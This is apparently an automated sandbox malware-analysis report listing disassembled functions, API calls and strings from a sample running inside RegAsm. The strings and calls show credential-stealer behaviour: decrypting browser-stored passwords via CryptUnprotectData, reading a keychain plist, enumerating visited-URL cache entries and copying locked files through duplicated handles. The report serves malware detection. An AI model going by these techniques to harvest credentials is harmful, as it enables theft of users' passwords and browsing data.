                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                      • API String ID: 2334598624-3798722523
                                                                                                                                                                                                                      • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                      Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                      • API String ID: 1442760552-28296030
                                                                                                                                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                      Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                      • API String ID: 229402216-2783969131
                                                                                                                                                                                                                      • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                      Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                      Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                                                                      • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                                                                      • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                                                                      • exit.MSVCRT ref: 00446897
                                                                                                                                                                                                                      • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2791496988-0
                                                                                                                                                                                                                      • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                      Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                                                                      • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                      Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                      • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                      Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 115830560-3916222277
                                                                                                                                                                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                      Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                                                                      • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                      Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
